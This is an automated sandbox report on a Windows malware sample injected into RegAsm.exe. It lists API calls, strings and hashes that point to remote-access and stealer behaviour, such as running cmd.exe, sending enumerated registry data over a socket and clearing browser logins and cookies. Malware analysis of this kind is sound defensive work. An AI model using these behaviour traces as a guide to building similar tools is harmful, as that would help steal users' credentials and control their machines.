  • Part of subcall function 0043B5D9: RtlAllocateHeap.NTDLL(00000000,0042CBD9,?,?,0042E317,?,?,5.1.3 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044158C
• _free.LIBCMT ref: 0044159F
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004415AE
Yara matches
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
APIs
• _free.LIBCMT ref: 00442BE5
  • Part of subcall function 0043BEB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
  • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
• _free.LIBCMT ref: 00442BF7
• _free.LIBCMT ref: 00442C09
• _free.LIBCMT ref: 00442C1B
• _free.LIBCMT ref: 00442C2D
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 00439753
  • Part of subcall function 0043BEB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
  • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
• _free.LIBCMT ref: 00439765
• _free.LIBCMT ref: 00439778
• _free.LIBCMT ref: 00439789
• _free.LIBCMT ref: 0043979A
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0040D4DD
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 0040D50C
• RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0040D5AC
Strings
Yara matches
Similarity
• API ID: Enum$InfoQueryValue
• String ID: [regsplt]
• API String ID: 3554306468-4262303796
APIs
• _strpbrk.LIBCMT ref: 00440918
• _free.LIBCMT ref: 00440A35
  • Part of subcall function 004322E3: IsProcessorFeaturePresent.KERNEL32(00000017,004322B5,00000000,00000000,00467F30,00000000,00000000,00000000,00467F30,?,004322D5,00000000,00000000,00000000,00000000,00000000), ref: 004322E5
  • Part of subcall function 004322E3: GetCurrentProcess.KERNEL32(C0000417), ref: 00432307
  • Part of subcall function 004322E3: TerminateProcess.KERNEL32(00000000), ref: 0043230E
Strings
Yara matches
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
• String ID: *?$.
• API String ID: 2812119850-3972193922
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00437F9E
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00437FB3
Strings
Yara matches
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: ~C$ ~C
• API String ID: 885266447-903778833
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00438B43
• _free.LIBCMT ref: 00438C0E
• _free.LIBCMT ref: 00438C18
Strings
Yara matches
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
• API String ID: 2506810119-1068371695
APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00401F7A), ref: 00401F96
• CloseHandle.KERNEL32(?), ref: 00401FED
• SetEvent.KERNEL32(?), ref: 00401FFC
Strings
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040A031
Strings
Yara matches
Similarity
• API ID: Exception@8Throw
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 2005118841-1866435925
APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0040F82E
Strings
Yara matches
Similarity
• API ID: ExecuteShell
• String ID: /C $cmd.exe$open
• API String ID: 587946157-3896048727
APIs
• RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,76230F10), ref: 0040D0CE
• RegQueryValueExW.ADVAPI32(?,del,00000000,00000000,?,00000400), ref: 0040D0EF
• RegCloseKey.ADVAPI32(?), ref: 0040D0F8
• API ID: CloseOpenQueryValue
• String ID: del
• API String ID: 3677997916-3960539263
APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004012FF
• GetProcAddress.KERNEL32(00000000), ref: 00401306
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll
• API String ID: 1646373207-2714051624
APIs
• LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004013A4
• GetProcAddress.KERNEL32(00000000), ref: 004013AB
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• API String ID: 2574300362-1519888992
• API ID: _free
• String ID:
• API String ID: 269201875-0
Strings
• [Cleared browsers logins and cookies.], xrefs: 004085CB
• Cleared browsers logins and cookies., xrefs: 004085DC
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0043CFCE,00000000,00000000,00000000,00000000,?,0043D2FA,00000006,FlsSetValue), ref: 0043D059
• GetLastError.KERNEL32(?,0043CFCE,00000000,00000000,00000000,00000000,?,0043D2FA,00000006,FlsSetValue,00453058,00453060,00000000,00000364,?,0043C6E6), ref: 0043D065
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0043CFCE,00000000,00000000,00000000,00000000,?,0043D2FA,00000006,FlsSetValue,00453058,00453060,00000000), ref: 0043D073
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 004149FD
• GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 00414A11
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 00414A36
• CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,004108FA), ref: 00414A44
• API ID: File$CloseCreateHandleReadSize
• String ID:
• API String ID: 3919263394-0
APIs
• GetSystemMetrics.USER32(0000004C), ref: 0041228E
• GetSystemMetrics.USER32(0000004D), ref: 00412294
• GetSystemMetrics.USER32(0000004E), ref: 0041229A
• GetSystemMetrics.USER32(0000004F), ref: 004122A1
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-0
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000018,00000000), ref: 004146B1
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000018,00000000), ref: 004146C4
• CloseHandle.KERNEL32(00000000,?,00000000,00000018,00000000), ref: 004146EF
• CloseHandle.KERNEL32(00000000,?,00000000,00000018,00000000), ref: 004146F7
• API ID: CloseHandleOpenProcess
• String ID:
• API String ID: 39102293-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0042FA28
  • Part of subcall function 00430060: ___AdjustPointer.LIBCMT ref: 004300AA
• _UnwindNestedFrames.LIBCMT ref: 0042FA3F
• ___FrameUnwindToState.LIBVCRUNTIME ref: 0042FA51
• CallCatchBlock.LIBVCRUNTIME ref: 0042FA75
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• String ID:
• API String ID: 2633735394-0
APIs
• ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0042E743
• ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0042E748
• ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0042E74D
  • Part of subcall function 00431D68: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00431D79
• ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0042E762
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                              • String ID:
                                                                                              • API String ID: 1761009282-0
                                                                                              • Opcode ID: bc6d224e8d5b72e5f3cec7e581ad8da2a683ecd1731032797a77a3d4aa2a10c8
                                                                                              • Instruction ID: 553a3698c3aa90dbaf59acd9f5d3f90f695d611f681d1e27becbad91c9f45b66
                                                                                              • Opcode Fuzzy Hash: bc6d224e8d5b72e5f3cec7e581ad8da2a683ecd1731032797a77a3d4aa2a10c8
                                                                                              • Instruction Fuzzy Hash: 7FC04818604220512EA8BAB333032AE03000CEB3DDFE434CFACA5272239E0E340B603F
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID: 01B
                                                                                              • API String ID: 2931989736-2242190220
                                                                                              • Opcode ID: 5fd4cb2f2eb6f2e596b517fbba611d9e39b9e3e279a93673eb84f45a6bccc248
                                                                                              • Instruction ID: b681089afacfdc10096d0b0687866a9e2916795602fd0264882fd2f37da336bc
                                                                                              • Opcode Fuzzy Hash: 5fd4cb2f2eb6f2e596b517fbba611d9e39b9e3e279a93673eb84f45a6bccc248
                                                                                              • Instruction Fuzzy Hash: F151B531B00626ABCB21CF6AEA80A6BF7B5FF54310F95812ADD5897320D735ED11CB84
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 0040D763
                                                                                                • Part of subcall function 0040D476: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0040D4DD
                                                                                                • Part of subcall function 0040D476: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 0040D50C
                                                                                                • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                              • RegCloseKey.ADVAPI32(?,00459594,00459594,0045962C,0045962C,00000071), ref: 0040D8B7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                                                              • String ID: X|F
                                                                                              • API String ID: 3114080316-2178643013
                                                                                              • Opcode ID: 1eed004b071fb2661832d28135a6be1c903714b6b2a52b3367965b57650ced07
                                                                                              • Instruction ID: 52a15b34a4ac20fa923b067356e63d5415b277d9ab81aa83f9cc7be8be0fef2c
                                                                                              • Opcode Fuzzy Hash: 1eed004b071fb2661832d28135a6be1c903714b6b2a52b3367965b57650ced07
                                                                                              • Instruction Fuzzy Hash: 5641AD71A002185ACB04F775DCA6AEE77649B91308F40817FF60A772D2EF781E89C65E
                                                                                              APIs
                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00443FA3,?,00000050,?,?,?,?,?), ref: 00443E23
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ACP$OCP
                                                                                              • API String ID: 0-711371036
                                                                                              • Opcode ID: a6acee0346e3f6ae40b400c22f75c3be6bc2a9de64828de0f4f71846a915cbd2
                                                                                              • Instruction ID: d655ddf23005c5a9f15a52119ce0e88508a13c35cbcc5d652d1131ff6491d290
                                                                                              • Opcode Fuzzy Hash: a6acee0346e3f6ae40b400c22f75c3be6bc2a9de64828de0f4f71846a915cbd2
                                                                                              • Instruction Fuzzy Hash: 3421C1A2E00101A6FB248E64D901B9B72A6EF54F57F668427F90AD7304E73ADF01C398
                                                                                              APIs
                                                                                              • GetDriveTypeA.KERNEL32(00000000,?,0000000A,00467C58,?), ref: 00404F58
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,0000002D), ref: 00404FB4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DriveTypelstrlen
                                                                                              • String ID: HW@
                                                                                              • API String ID: 1700768220-49188713
                                                                                              • Opcode ID: 40dcda4e39f6a4a506deb1e49bef629affa3386828b738860e7e0b9726f5f8ee
                                                                                              • Instruction ID: b053ae4ecd666080b16dde0db474da89a2947785c19d13b690d771263e7a6f4c
                                                                                              • Opcode Fuzzy Hash: 40dcda4e39f6a4a506deb1e49bef629affa3386828b738860e7e0b9726f5f8ee
                                                                                              • Instruction Fuzzy Hash: 4A01C271A002156BCB04F775ED5A9AEB7689F95304F10003FFA06B21D1EFB85A45C799
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004349A0
                                                                                              • GetLastError.KERNEL32(?,?), ref: 004349AE
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?), ref: 00434A09
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1717984340-0
                                                                                              • Opcode ID: db417f25f6f92e00efcf0fc15827a5cd8d80a02f931988234b875dda48a2efa7
                                                                                              • Instruction ID: cc1d80011ffea3f1df985999827adad67b7e2f370d91c135a993c9fa55757793
                                                                                              • Opcode Fuzzy Hash: db417f25f6f92e00efcf0fc15827a5cd8d80a02f931988234b875dda48a2efa7
                                                                                              • Instruction Fuzzy Hash: FE410935A00201AFDF219F65C844BFBBBA4EFCA310F1451AAF859572A1D738AD01C75C
                                                                                              APIs
                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 0040C9EE
                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 0040CAC3
                                                                                              • SetLastError.KERNEL32(0000007F), ref: 0040CADE
                                                                                              • SetLastError.KERNEL32(0000007E,?,0040CD60), ref: 0040CAF7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastRead
                                                                                              • String ID:
                                                                                              • API String ID: 4100373531-0
                                                                                              • Opcode ID: db9137be8a35981e6591980c942ba5589716ffca3f2a32cd0978180f6a0b4dbf
                                                                                              • Instruction ID: 499532b790c8abcea526b823558a84bddce30115e00368c610d72d2e208af3f3
                                                                                              • Opcode Fuzzy Hash: db9137be8a35981e6591980c942ba5589716ffca3f2a32cd0978180f6a0b4dbf
                                                                                              • Instruction Fuzzy Hash: AD416671B00209DFDB24CF99D884B6AB7F5EF48310F10856AE506A7291EB78E801CF54